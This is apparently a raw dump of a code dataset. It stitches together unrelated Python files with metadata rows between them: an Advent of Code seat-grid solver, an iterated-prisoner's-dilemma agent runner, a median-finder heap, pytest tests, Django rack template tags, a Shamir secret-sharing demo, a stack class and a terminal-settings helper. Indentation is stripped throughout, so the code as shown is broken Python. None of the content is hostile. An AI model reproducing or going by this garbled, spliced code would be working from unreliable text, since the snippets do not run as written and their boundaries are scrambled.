LLLLLLLLLLLLLLLLLLLLL.LLLL.LLLL.LLLLLL.LLLLLLLLLLLLLLLLLLLL.LLLL.LLLLLLLLLLLLLLL.LLLL.LLLLL
LLLLL..LLLLL.LLLLLLLL.LLLL.LLL..LLLLLL.LLLLLLL.LLLLL.LLLLLL.LLLL.LLLLLLLL.LLLLLL.LLLLLLLLLL
LLLLL.LLLLLL.LLLLLLLL.LLLL.LLLL.LLLLLL.LLLLLLLLLLLLL.LLLLLL.LLLL.LLLLLLLL.LLLLLLLLLLLLLLLLL
LLLLL.LLLLL..LLLLLLLL.LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL.LLLLLLLL.LLLLLL.LLLL.LLLLL
LLLLL.LLLLLLLLLLLLLLL.LLLLLLLLL.LLLLLL.LLLLLLL.LLLLL.LLLLLLLLLLL.LLLLLLLL.LLLLLL.LLLL.LLLLL
LLLLL.LLLLLL.LLLLLLLL.LLLL.LLLLLLLLLLLLLLLLLLL.LLLLL.LLLLLL.LLLL.LLLLLLLL.LLLLLLLLLLL.LLLLL
LLLLL.LLLLLL.LLLLLLLLLLLLL.LLLL.LLLLLL.LLLLLLL.LLLLLLLLLLLL.LLLL.LLLLLLLL.LLLLLLLLLLL.LLLLL
..L..LL.......L.LLLL.L.....L...L.LL...LLLLL.L.....L..L...LL.LL..L..LLLLLL..........LL.....L
LLLLL.LLLLLL.LLLLLLLL.LLLL.LLLLLLLLLLLLLLLLLLL.LLLLL.LLLLLL.LLLL.LLLLLLLLLLLLLLLLLLLL.LLLLL
LLLLL.LLLLLL.LLLLLLLLLLLLL.LLLL.LLLLLLLLLLLLLL.LLLLLLLLLLLL.LLLLLLLLLLLLL.LLLLLLLLLLL.LLLLL
LLLLLLLLLLLLLLLLLLLLLLLLLL.LLLLLLLLLLL.LLLLLLL.LLLLL.LLLLLLLLLLL.LLLLLLLLLLLLLLL.LLLLLLLLLL
LLLLLLLLLLLL.LLLLLLLL.LLLL.LLLL.LLLLLLLLLLLLLL.LLLLLLLLLLLLLLLLLLLLLLLLLL.LLLLLLLLLLLLLLLLL
LLLLL.LLLLLL.LLLLLLLL.LLLL.LLLL.LLLLLL.LLLLLLL.LLLLL.LLLLLL.LLLLLLLLLLLLLLLLLLLL.LLLL.LLLLL
LLLLL..LLLLL.LLLLLLLL.LLLL.LLLLLLLLLLLLLLLLLLLLLLLLL.LLLLLLLLLLLLLLLLLLLL.LLLLLL.LLLL.LLLLL
LLLLLLLLLLLL.LLLLLLLLLLLLL.LLLL.LLLLLL..LLLLLL.LLLLLLLLLLLLLLLLLLLLLLLLLL.LL.LLLLLLLL.LLLLL
LLLLL.LLLLLLLLLLLLLLLLLLLL.LLLLLLLLLLL.LLLLLLL.LLLL..LLLLLL.LLLL.LLLLLLLL.LLLLLLLLLLL.LLLLL
L...LL....L..L..LL.........L.L...LL..LL.L....L...........LL.L.......L.L.L.......L..L..LL..L
LLLLL.LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL.LLLLLLL.LLLLL.LL.LLL.LLLL.LLLLLLLL.LLLLLL.LLLL.LLLLL
LLLLL.LLLLLLLLLLLLLLL.LLLL.LLLL.LLLLLL.L.LLLLLLLLLLL.LL.LLL.LLLLLLLLLLLLL.LLLLLL.LLLL.LLLLL
LLLLLLLLLLLLLLLLLLLLL.LLLL.LLLL.L.LLLL.LLLLLLLLLLLL..L.LLLL.L.LL.LLLLLLLL.LLLLLLLLLLLLLLLL.
LLLLL.LLLLLL.LLLLLLLL.LLLL.LLLL.LLLLLLLLLLLLLL.LLLLL.LLLLLL.LLLL.LLLLLLLL.LLLLLLLLLLLLLLLLL
LLLLL.LLLLLL.LLLLLLLLL.LLL.LLLL.LLLLLL.LLLLLLL.LLLLL.LLLLLL.LLLL.LLLLLLLL.LLLLLL.LLLL.LLLLL
LLLLLLLLLLLL.LLLLLLLL.LLLLLLLLL.LLLLLLLLLLLLLLLLLLLL.LLLLLLLLLLL.LLLLLLLL.LLLLLL.LLLLLLLLLL
LLLLL.LLLLLLLLLLLLLLL.LLLL.LLLLLLLLLLLLLLLLLLL.LLLLL.LLLLLLLLLLL.LLLLLLLLLLLLLLL.LLLLLLLLLL
LLLLLLLLLLLL.LLLLLLLLLLLLLLLLLLLLLLLLL.LLLLLLL.LLLLL.LLLLLL.LLLLLLLLLLLLL.LLLLLLLLLLLLLLLLL
.....L.LLL...LL..LL.....L....LL.......L...LL..L..L...L...L.LL.LL.LL...LL..LLL.L..LLL..LLLL.
LLLLLLLLLLLLLLLLLLLLL.LLLL.LLLL.LLLLLL.LLLLLLLLLLLLLLLLLLLL.LLLLLLLLLLLLL.LLLLLL.LLLL.LLLLL
LLLLLLLLLLLL.LLLLLLLL.LLLLLLLLL.LLLLLLLLLLLL.L.LLLLL.LLLLLL.LLLL.LLLLLLLL.LLLLLL.LLLL.LLLLL
LLLLL.LLLLLLLLLLLLLLL.LLLL.LLLLLLLLL.LLLLLLLLL.LLLLLLLLLLLL.LLLLLLLLLLLLL.LLLLLLLLLLL.LLLLL
LLLLL.LLLLLL.LLLLLLLL.LLLL.LLLL.LLLLLL.LLLLLLLLLLLLL.LLLLLL.LLLLLLLLLLLLL.LLLLLLLLLLLLLLLLL
LLLLLLLLLLLLLLLLLLLLLLLLLL.LLLLLLLLLLL.LLLLLLLLLLLLL.LLLLLLLLLLL.LLLLLLLL.LLLLLLLLLLL.LLLLL
LLLLL.LLLLLLLLLLLLLLL.LLLL..LLL.LLLLLLLLLLLLLL.LLLL..LLLLLLLLLLL.LLLLLLLL.LLLLLL.LLLLLLLLLL
LLLLLLLLLLLL.LLLLLLLL.LLLL.LLLL.LLLLLL.LLLLLLL.LLLLL.LLLLLL.LLLLLLLLLLLLL.LLLLLL.LLLL.LLLLL
LLLLL.LLLLLLLLLLLLLLL.LLLL.LLLLLLLL.LL.LLLLLLLLLLLLL.LL.LLL.LLLLLLLLLLLLL.LLLLLL.LLLL.LLLLL
..L..LL.........L....L.L.L.L...L....L...........LL....L..L...L.LL..L..LL.L..LL..L..L.L..L.L
LLLLL.LLLLLL.LLLLLLLL.LLLL.LLLLLLLLLLLLLL.LLLL.LLLLLLLLLLLL.LLLL.LLLLLLLLLLLLLLL.LLLL.LLLLL
LLLLL.LLLLLL.LLLLLLLL.LLLLLLLLLLLLLLLLLLLLLLLL.LLLLLLLLLLLL.LLLLLLLLLLLLL.LLLLLL.LLLLLLLLLL
LLLLL.LLLLLLLLLLLLLLLLLLLL.LLLL.LLLLLL.LLLLLLL.LLLLLLLLLLLL.LLLL.LLLLLLLL.LLLLLL.LLLLLLLLLL
LLLLL.LLLLLL.LLLLLLLLLLLLL.LLLL.LLLLLLLLLLLLLLLLLLLL.LLLLLL.LLLLLLLLLLLLLLLLLLLL.LLLLLLLLLL
LLLLL.LLLLLLLLLLLLLLL.LLLLLLLLL.LLLLLL.LLLLLLLLLLLLL.LLLLLLLLLLL.LLLLLLLLLLLLLLL.LLLL.LLLLL
....L............L....LL......L.LLL.LLL....LL.....L..L.LL.L........L..L......L.LLL..LL..LL.
LL.LLLLLLLLL.LLLLLLLL.LLLL.LLLL.LLLLLL.LLLLLLL.LLLLL.LLLLLL.LLLLLLLLLLLLLLLLLLLL.LLLLLLLLLL
LLLLL.LLLLLL.LLLLLLLL.L.LLLLLLL.LLLLLLLLLLLLLL.LLLLLLLLLLLLLLLLL.LLLLLLLL..LLLLL.LLLL.LLLLL
LLLLL.LLLLLL.LLLLLLLLLLLLL.LLLL.LLLLLL.LLLLLLL.LLLLLLLLLLLL.LLLLLLLLLLLLLLLLLLLL.LLLLLLLLLL
LLLLLLLLLLLL.LLLLLLLL.LLLL.LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL..LLLLLLLLLLLLLLLLLLL.LLLLL
LLLLL.LLLLLL.LLLLLLLL.LLLLLLLLLLLLL.LL.LLLLLLLLLLLLL.LLLLLL.LLLL.LLLLLLLL.LLLLLL.LLLL.LLLLL
LLLLLLLLLLLL.LLLLLLLL.LLLLLLLLL.LLLLLL.LLLLLLLLLLLLL.LLLLLL.LLLLLLLLLLLLL.LLLLLL.LLLL.LLLLL
LLLLL.L.LLLL.LLLLLLLL.LLLLLLLLL.LLLLLL.LLLLLLLLLLLLL.LLLLLL.LLLL.LLLLLLLL.LLLLLLLLLLL.LLLLL
LLLLL.LLLLLL.LLLLLLLL.LLLL.LLLL.LLLLLLLLLLLLLL.LLLLL.LLLLLL.LLLL.LLLLLLLL.LLLLLLLLLLLLLLLLL
LLLLL.LLLLLLLLLLLLLLL.LLLL.LLLL.LLLLLL.LLLLLLLLLLLLL.LLLLLLLLLLL.LLLLLLLL.LLLLLL.LLLLLLLLLL
.L......LLL...L.L.LL.L.....LL.L..L.L.LLLLL....LL..L...L..L.....L.L...L...L.L.LL.LL.L.......
LLLLLLLLLLLL.LLLLLLLL.LLLLLLLLL.LLLLLL.LLLLLLL.LLLLL.LLLLLL.LLLL.LLLLLLLLLLLLLLL.LLLL.LLLLL
LLLLL.LLLLLL.LLLLLLLL.LLLL.LLLL.LLLLLL.LLLLLLL.LLLLL.LLLLLLLLLLL.LLLLLLLLLLLLLLLLLLLL.LLLLL
LLLLL.LLLLLL.LLLLLLLL.LLLLLLLLL.LLLLLL.LLLLLLL.LLLLLLLLLLLL.LLLL.LLLLLLLL.LLLLLLLLLLL.LLLLL
LLLLLLLLLLLLLLLLLLLLL.LLLLLLLLL.LLLLLL.LLLLLLLLLLLLL.LLLLLLLLLLL.LLLLLLLLLLLLLLL.LLLLLLLLLL
LLLLL.LLLLLLLLLLLLLL..LLLLLLLLL.LLLLLL.LLLLLLL.LLLLL.LLLLL..LLLL.LLLLLLLLLLLLLLLLLLLLLLLLLL
LLLLLLLLLLLLLLLLLLLLL.LLLL.LLLLLLLLLLLLLLLLLLL.LLLLL.LLLLLL.LLLL.LLLLLLLL.LLLLLL.LLLL.LLLLL
"""
import numpy as np
val = {'L': -1, '#': 1, '.': 0}
rval = {v: k for k, v in val.items()}
def strtoarray(text):
return np.array([[val[i] for i in line] for line in
text.strip().splitlines()])
def arraytostr(a):
if a.ndim == 1:
a = a.reshape((1, a.size))
return '\n'.join([''.join([rval[i] for i in row]) for row in a])
def adjacent(a, i, j):
rows, cols = a.shape
adj = []
for newi in [i - 1, i, i + 1]:
for newj in [j - 1, j, j + 1]:
if (newi, newj) == (i, j):
continue
if newi < 0 or newj < 0:
continue
if newi >= rows or newj >= cols:
continue
adj.append(a[newi, newj])
return np.array(adj)
def adjacent2(a, i, j):
rows, cols = a.shape
adj = []
for idir in [-1, 0, 1]:
for jdir in [-1, 0, 1]:
if idir == jdir == 0:
continue
for x in range(1, max(rows, cols)):
newi = i + idir*x
newj = j + jdir*x
if newi < 0 or newi >= rows or newj < 0 or newj >= cols:
break
c = a[newi, newj]
if c in [-1, 1]:
adj.append(c)
break
return np.array(adj)
def apply_rules(a):
newa = a.copy()
rows, cols = a.shape
changed = False
for i in range(rows):
for j in range(cols):
if a[i, j] == 0:
continue
adj = adjacent(a, i, j)
if a[i, j] == -1 and np.sum(adj==1) == 0:
changed = True
newa[i, j] = 1
elif a[i, j] == 1 and np.sum(adj==1) >= 4:
changed = True
newa[i, j] = -1
return newa, changed
def generations(a):
n = 0
while True:
print("Generation", n)
print(arraytostr(a))
print()
a, changed = apply_rules(a)
if not changed:
return a
n += 1
def apply_rules2(a):
newa = a.copy()
rows, cols = a.shape
changed = False
for i in range(rows):
for j in range(cols):
if a[i, j] == 0:
continue
adj = adjacent2(a, i, j)
if a[i, j] == -1 and np.sum(adj==1) == 0:
changed = True
newa[i, j] = 1
elif a[i, j] == 1 and np.sum(adj==1) >= 5:
changed = True
newa[i, j] = -1
return newa, changed
def generations2(a):
n = 0
while True:
print("Generation", n)
print(arraytostr(a))
print()
a, changed = apply_rules2(a)
if not changed:
return a
n += 1
print("Day 11")
print("Part 1")
print("Test input")
testa = strtoarray(test_input)
print(test_input)
print(testa)
print(arraytostr(testa))
print("Adjacent to 0, 0", arraytostr(adjacent(testa, 0, 0)))
print("Adjacent to 2, 2", arraytostr(adjacent(testa, 2, 2)))
test_finala = generations(testa)
print(np.sum(test_finala == 1))
print("Puzzle input")
a = strtoarray(input)
finala = generations(a)
print(np.sum(finala == 1))
print("Part 2")
print("Test input")
testa2 = strtoarray(test_input2)
assert testa2[4, 3] == -1
print(adjacent2(testa2, 4, 3))
testa3 = strtoarray(test_input3)
assert testa3[1, 3] == -1
print(adjacent2(testa3, 1, 3))
testa4 = strtoarray(test_input4)
assert testa4[3, 3] == -1
print(adjacent2(testa4, 3, 3))
test_finala = generations2(testa)
print(np.sum(test_finala==1))
print("Puzzle input")
finala = generations2(a)
print(np.sum(finala == 1))
| 45.861702
| 91
| 0.718163
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 9,408
| 0.727441
|
220420bd932e73713baed1135186d8fa37af4fd2
| 2,849
|
py
|
Python
|
final/runner_2.py
|
Pluriscient/sma2c-ipd
|
e6e4a5240930491a996afda4744714c5c4826ac2
|
[
"MIT"
] | null | null | null |
final/runner_2.py
|
Pluriscient/sma2c-ipd
|
e6e4a5240930491a996afda4744714c5c4826ac2
|
[
"MIT"
] | null | null | null |
final/runner_2.py
|
Pluriscient/sma2c-ipd
|
e6e4a5240930491a996afda4744714c5c4826ac2
|
[
"MIT"
] | null | null | null |
from SMA2CAgent import SMA2CAgent
from A2CAgent import A2CAgent
from RandomAgent import RandomAgent
# from .SMA2CAgent import SMA2CAgent
import gym
import numpy as np
from IPD_fixed import IPDEnv
import axelrod
import time
import argparse
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--rounds", help='number of rounds to play per episode', type=int, default=20)
parser.add_argument("--episodes", help='number of episodes to play', type=int, default=1000)
parser.add_argument("--seed", help='random seed, -1 if random', type=int, default=-1)
parser.add_argument("--output", help="output folder", default=f'output-{time.time():.0f}')
parser.add_argument("--pure-a2c", help="Don't use an encoder", action='store_true')
parser.add_argument("--alpha", help='LR of encoder', type=float)
parser.add_argument("--beta", help = 'LR of A2C agent', type=float)
parser.add_argument("--lstm-dims", help='LSTM dimensions', type=int)
parser.add_argument("--encoder-fc", help='dimensions of encoder dense layers',type=int, action='append')
parser.add_argument("--a2c-fc", help='dimensions of a2c hidden layers', type=int, action='append')
parser.add_argument("--latent-dims", help='dimensions of code', type=int)
parser.add_argument("opponents", help='opponents that the bot should face', nargs="*")
parser.add_argument("--random", help="Don't use an agent, just random", action='store_true')
# parser.add_argument("")
args = parser.parse_args()
opponents = []
strats = dict([(s.name.lower(), s) for s in axelrod.all_strategies])
for opp in args.opponents:
if opp not in strats:
print(f'{opp} not found in strats')
s = strats[opp]
opponents.append(s)
env = IPDEnv({'rounds': args.rounds, 'opponents' : opponents})
seed = args.seed if args.seed != -1 else None
env.seed(seed=seed)
# remove empty values
config = {k: v for k, v in vars(args).items() if v is not None}
if config['pure_a2c']:
print("____USING PURE A2C_____")
agent= A2CAgent(env, config)
elif config['random']:
print("__RANDOM AGENT___")
agent = RandomAgent(env, config)
else:
print("____USING SMA2C______")
agent = SMA2CAgent(env, config)
# obs = env.reset()
# action = agent.act(obs, 0, 0, 1)
# print(f'resulting action: {action}')
# encodings_before = np.array(agent.encode_run(axelrod.Cooperator()))
# print(f'encodings before: {encodings_before}')
agent.run(episodes=args.episodes)
# encodings_after_c = np.array(agent.encode_run(axelrod.Cooperator()))
# encodings_after_d = np.array(agent.encode_run(axelrod.Defector()))
# print(f'encodings after: {encodings_after_c}')
# print(encodings_after_d)
agent.save()
| 43.830769
| 108
| 0.67708
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,193
| 0.418743
|
2204368a20f00021e6e644e58818806aeac0f4fc
| 876
|
py
|
Python
|
295-find-median-from-data-stream/295-find-median-from-data-stream.py
|
Dawit-Getachew/A2SV_Practice
|
2fe06d725e0acfe668c6dae98fe3ef6e6e26ef61
|
[
"MIT"
] | null | null | null |
295-find-median-from-data-stream/295-find-median-from-data-stream.py
|
Dawit-Getachew/A2SV_Practice
|
2fe06d725e0acfe668c6dae98fe3ef6e6e26ef61
|
[
"MIT"
] | null | null | null |
295-find-median-from-data-stream/295-find-median-from-data-stream.py
|
Dawit-Getachew/A2SV_Practice
|
2fe06d725e0acfe668c6dae98fe3ef6e6e26ef61
|
[
"MIT"
] | null | null | null |
import heapq as h
class MedianFinder:
def __init__(self):
self.rightHalf = []
self.leftHalf = []
def addNum(self, num: int) -> None:
if len(self.leftHalf) > len(self.rightHalf):
temp = h.heappush(self.leftHalf, -num)
temp2 = h.heappop(self.leftHalf)
h.heappush(self.rightHalf, -temp2)
else:
temp = h.heappush(self.rightHalf, num)
temp2 = h.heappop(self.rightHalf)
h.heappush(self.leftHalf, -temp2)
def findMedian(self) -> float:
if len(self.leftHalf) == len(self.rightHalf):
temp = (-self.leftHalf[0] + self.rightHalf[0])/2
return temp
else:
return -self.leftHalf[0]
# Your MedianFinder object will be instantiated and called as such:
# obj = MedianFinder()
# obj.addNum(num)
# param_2 = obj.findMedian()
| 31.285714
| 67
| 0.586758
| 718
| 0.819635
| 0
| 0
| 0
| 0
| 0
| 0
| 134
| 0.152968
|
2204946bef0686b31437d34ea53f7a86c1f9035c
| 1,781
|
py
|
Python
|
mottak-arkiv-service/tests/routers/mappers/test_metadatafil.py
|
omBratteng/mottak
|
b7d2e1d063b31c2ad89c66e5414297612f91ebe9
|
[
"Apache-2.0"
] | 4
|
2021-03-05T15:39:24.000Z
|
2021-09-15T06:11:45.000Z
|
mottak-arkiv-service/tests/routers/mappers/test_metadatafil.py
|
omBratteng/mottak
|
b7d2e1d063b31c2ad89c66e5414297612f91ebe9
|
[
"Apache-2.0"
] | 631
|
2020-04-27T10:39:18.000Z
|
2022-03-31T14:51:38.000Z
|
mottak-arkiv-service/tests/routers/mappers/test_metadatafil.py
|
omBratteng/mottak
|
b7d2e1d063b31c2ad89c66e5414297612f91ebe9
|
[
"Apache-2.0"
] | 3
|
2020-02-20T15:48:03.000Z
|
2021-12-16T22:50:40.000Z
|
import pytest
from app.domain.models.Metadatafil import Metadatafil, MetadataType
from app.exceptions import InvalidContentType
from app.routers.mappers.metadafil import _get_file_content, metadatafil_mapper, _content_type2metadata_type
def test__content_type2metadata_type__success():
"""
GIVEN the string 'text/xml' as content_type
WHEN calling the method _content_type2metadata_type
THEN check that return value is MetadataType.XML_METS
"""
expected = MetadataType.XML_METS
actual = _content_type2metadata_type('text/xml')
assert actual == expected
def test__content_type2metadata_type__failure():
"""
GIVEN the string 'text' as content_type
WHEN calling the method _content_type2metadata_type
THEN check that a InvalidContentType Exception has been raised
"""
with pytest.raises(InvalidContentType):
_content_type2metadata_type('text')
def test__get_file_content(testfile, testfile_content):
"""
GIVEN a file with testdata where the content is an METS/XML file
WHEN calling the method _get_file_content
THEN check that the returned string is correct
"""
expected = testfile_content
actual = _get_file_content(testfile)
assert actual == expected
def test_metadatafil_mapper(testfile, testfile_content):
"""
GIVEN a file with testdata where the content is an METS/XML file
WHEN calling the method metadatafil_mapper
THEN check that the returned Metadatafil object is correct
"""
expected = Metadatafil(
filnavn="df53d1d8-39bf-4fea-a741-58d472664ce2.xml",
type_=MetadataType.XML_METS,
innhold=testfile_content)
actual = metadatafil_mapper(testfile)
assert vars(actual) == vars(expected)
| 34.25
| 108
| 0.742841
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 808
| 0.453678
|
2204c4afb63d7b851791357727ac0902218aab44
| 2,748
|
py
|
Python
|
src/niweb/apps/noclook/templatetags/rack_tags.py
|
emjemj/ni
|
a78e6d97d1e4610aad7698c4f0f459221c680b4f
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
src/niweb/apps/noclook/templatetags/rack_tags.py
|
emjemj/ni
|
a78e6d97d1e4610aad7698c4f0f459221c680b4f
|
[
"BSD-2-Clause-FreeBSD"
] | 2
|
2019-07-24T12:41:11.000Z
|
2020-03-31T10:10:04.000Z
|
src/niweb/apps/noclook/templatetags/rack_tags.py
|
emjemj/ni
|
a78e6d97d1e4610aad7698c4f0f459221c680b4f
|
[
"BSD-2-Clause-FreeBSD"
] | 1
|
2019-02-25T14:58:20.000Z
|
2019-02-25T14:58:20.000Z
|
from django import template
register = template.Library()
RACK_SIZE_PX = 20
MARGIN_HEIGHT = 2
def _rack_unit_to_height(units):
# for every unit over 1 add a 2 px margin
margin = (units - 1) * MARGIN_HEIGHT
return units * RACK_SIZE_PX + margin
def _equipment_spacer(units):
return {
'units': units,
'spacer': True,
'height': "{}px".format(_rack_unit_to_height(units)),
}
def _rack_sort(item):
# Sort by rack position, sencoded by unit size
pos = int(item.get('node').data.get('rack_position', -1))
size = int(item.get('node').data.get('rack_units', 0)) * -1
return (pos, size)
def _equipment(item):
data = item.get('node').data
units = int(data.get('rack_units', 1))
return {
'units': units,
'position': int(data.get('rack_position', 0) or 0),
'position_end': units + int(data.get('rack_position', 1)) - 1,
'height': "{}px".format(_rack_unit_to_height(units)),
'sub_equipment': [],
'is_back': data.get('rack_back'),
'data': data,
}
def place_equipment(view_data, current_idx, last_eq, result):
spacing = view_data['position'] - current_idx
if spacing < 0:
# Equipment overlaps with previous
last_eq['sub_equipment'].append(view_data)
else:
if spacing > 0:
result.append(_equipment_spacer(spacing))
result.append(view_data)
new_idx = view_data['position'] + view_data['units']
return new_idx, view_data
return current_idx, last_eq
@register.inclusion_tag('noclook/tags/rack.html')
def noclook_rack(rack, equipment):
if equipment:
equipment.sort(key=_rack_sort)
racked_equipment = []
racked_equipment_back = []
unracked_equipment = []
# mem
front_idx = 1
front_last_eq = None
back_idx = 1
back_last_eq = None
for item in equipment:
view_data = _equipment(item)
is_rack_front = not view_data.get('is_back')
if view_data['position'] > 0:
if is_rack_front:
front_idx, front_last_eq = place_equipment(view_data, front_idx, front_last_eq, racked_equipment)
else:
back_idx, back_last_eq = place_equipment(view_data, back_idx, back_last_eq, racked_equipment_back)
else:
unracked_equipment.append(item)
return {
'rack_size': _rack_unit_to_height(rack.data.get('rack_units', 42)),
'racked_equipment': racked_equipment,
'racked_equipment_back': racked_equipment_back,
'unracked_equipment': unracked_equipment,
}
@register.filter
def rack_sort(equipment):
if equipment:
equipment.sort(key=_rack_sort, reverse=True)
return equipment
| 28.926316
| 114
| 0.643377
| 0
| 0
| 0
| 0
| 1,193
| 0.434134
| 0
| 0
| 497
| 0.180859
|
2205e64387c6f4c5a706049e6175c53d8453ff11
| 442
|
py
|
Python
|
Cryptography/Exp-1-Shamirs-Secret-Sharing/main.py
|
LuminolT/Cryptographic
|
87fffae591eee9644641a4c511972df0c2a44df7
|
[
"MIT"
] | null | null | null |
Cryptography/Exp-1-Shamirs-Secret-Sharing/main.py
|
LuminolT/Cryptographic
|
87fffae591eee9644641a4c511972df0c2a44df7
|
[
"MIT"
] | null | null | null |
Cryptography/Exp-1-Shamirs-Secret-Sharing/main.py
|
LuminolT/Cryptographic
|
87fffae591eee9644641a4c511972df0c2a44df7
|
[
"MIT"
] | 1
|
2022-03-07T13:56:55.000Z
|
2022-03-07T13:56:55.000Z
|
import numpy as np
import matplotlib.pyplot as plt
from shamir import *
from binascii import hexlify
# img = plt.imread('cat.png')
# plt.imshow(img)
# plt.show()
s = 'TEST_STRING'.encode()
print("Original secret:", hexlify(s))
l = Shamir.split(3, 5, '12345'.encode())
for idx, item in l:
print("Share {}: {}".format(str(idx), hexlify(item)))
shares = l[1:4]
secret = Shamir.combine(shares)
print(f'Secret is : {secret.decode()}')
| 18.416667
| 57
| 0.669683
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 142
| 0.321267
|
2206a89728beed4abfd89a30818175cab85e95be
| 825
|
py
|
Python
|
P20-Stack Abstract Data Type/Stack - Reverse Stack.py
|
necrospiritus/Python-Working-Examples
|
075d410673e470fc7c4ffc262e92109a3032132f
|
[
"MIT"
] | null | null | null |
P20-Stack Abstract Data Type/Stack - Reverse Stack.py
|
necrospiritus/Python-Working-Examples
|
075d410673e470fc7c4ffc262e92109a3032132f
|
[
"MIT"
] | null | null | null |
P20-Stack Abstract Data Type/Stack - Reverse Stack.py
|
necrospiritus/Python-Working-Examples
|
075d410673e470fc7c4ffc262e92109a3032132f
|
[
"MIT"
] | null | null | null |
"""Reverse stack is using a list where the top is at the beginning instead of at the end."""
class Reverse_Stack:
def __init__(self):
self.items = []
def is_empty(self): # test to see whether the stack is empty.
return self.items == []
def push(self, item): # adds a new item to the base of the stack.
self.items.insert(0, item)
def pop(self): # removes the base item from the stack.
return self.items.pop(0)
def peek(self): # return the base item from the stack.
return self.items[0]
def size(self): # returns the number of items on the stack.
return len(self.items)
s = Reverse_Stack()
print(s.is_empty())
s.push(4)
s.push("Dog")
print(s.peek())
s.push("Cat")
print(s.size())
print(s.is_empty())
s.pop()
print(s.peek())
print(s.size())
| 22.916667
| 92
| 0.632727
| 556
| 0.673939
| 0
| 0
| 0
| 0
| 0
| 0
| 306
| 0.370909
|
220737eae6a16eeacd5d110896be7e897b880d4e
| 101
|
py
|
Python
|
gerapy/cmd/server.py
|
awesome-archive/Gerapy
|
e9792d020397cd85b4d553b91b7829078b728b98
|
[
"MIT"
] | 1
|
2018-12-07T02:05:32.000Z
|
2018-12-07T02:05:32.000Z
|
gerapy/cmd/server.py
|
Tilyp/Gerapy
|
e9792d020397cd85b4d553b91b7829078b728b98
|
[
"MIT"
] | null | null | null |
gerapy/cmd/server.py
|
Tilyp/Gerapy
|
e9792d020397cd85b4d553b91b7829078b728b98
|
[
"MIT"
] | null | null | null |
from gerapy.server.manage import manage
import sys
def server():
# Call django cmd
manage()
| 14.428571
| 39
| 0.70297
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 17
| 0.168317
|
220739480d36f76e621c523e3b7cf2bdd8e3c62a
| 964
|
py
|
Python
|
client/walt/client/term.py
|
dia38/walt-python-packages
|
e6fa1f166f45e73173195d57840d22bef87b88f5
|
[
"BSD-3-Clause"
] | 4
|
2020-01-14T09:12:56.000Z
|
2022-03-14T14:35:11.000Z
|
client/walt/client/term.py
|
dia38/walt-python-packages
|
e6fa1f166f45e73173195d57840d22bef87b88f5
|
[
"BSD-3-Clause"
] | 73
|
2016-04-29T13:17:26.000Z
|
2022-03-01T15:06:48.000Z
|
client/walt/client/term.py
|
dia38/walt-python-packages
|
e6fa1f166f45e73173195d57840d22bef87b88f5
|
[
"BSD-3-Clause"
] | 3
|
2019-03-18T14:27:56.000Z
|
2021-06-03T12:07:02.000Z
|
#!/usr/bin/env python
import sys, tty, termios, array, fcntl, curses
class TTYSettings(object):
def __init__(self):
self.tty_fd = sys.stdout.fileno()
# save
self.saved = termios.tcgetattr(self.tty_fd)
self.win_size = self.get_win_size()
self.rows, self.cols = self.win_size[0], self.win_size[1]
curses.setupterm()
self.num_colors = curses.tigetnum("colors")
def set_raw_no_echo(self):
# set raw mode
tty.setraw(self.tty_fd, termios.TCSADRAIN)
# disable echo
new = termios.tcgetattr(self.tty_fd)
new[3] &= ~termios.ECHO
termios.tcsetattr(self.tty_fd, termios.TCSADRAIN, new)
def restore(self):
# return saved conf
termios.tcsetattr(self.tty_fd, termios.TCSADRAIN, self.saved)
def get_win_size(self):
buf = array.array('h', [0, 0, 0, 0])
fcntl.ioctl(self.tty_fd, termios.TIOCGWINSZ, buf, True)
return buf
| 35.703704
| 69
| 0.629668
| 893
| 0.926349
| 0
| 0
| 0
| 0
| 0
| 0
| 85
| 0.088174
|
22075aae320e407eb3fd67de73b37aec7dd0a0b3
| 25,123
|
py
|
Python
|
improver_tests/calibration/ensemble_calibration/test_CalibratedForecastDistributionParameters.py
|
cpelley/improver
|
ebf77fe2adc85ed7aec74c26671872a2e4388ded
|
[
"BSD-3-Clause"
] | null | null | null |
improver_tests/calibration/ensemble_calibration/test_CalibratedForecastDistributionParameters.py
|
cpelley/improver
|
ebf77fe2adc85ed7aec74c26671872a2e4388ded
|
[
"BSD-3-Clause"
] | null | null | null |
improver_tests/calibration/ensemble_calibration/test_CalibratedForecastDistributionParameters.py
|
cpelley/improver
|
ebf77fe2adc85ed7aec74c26671872a2e4388ded
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# (C) British Crown Copyright 2017-2021 Met Office.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
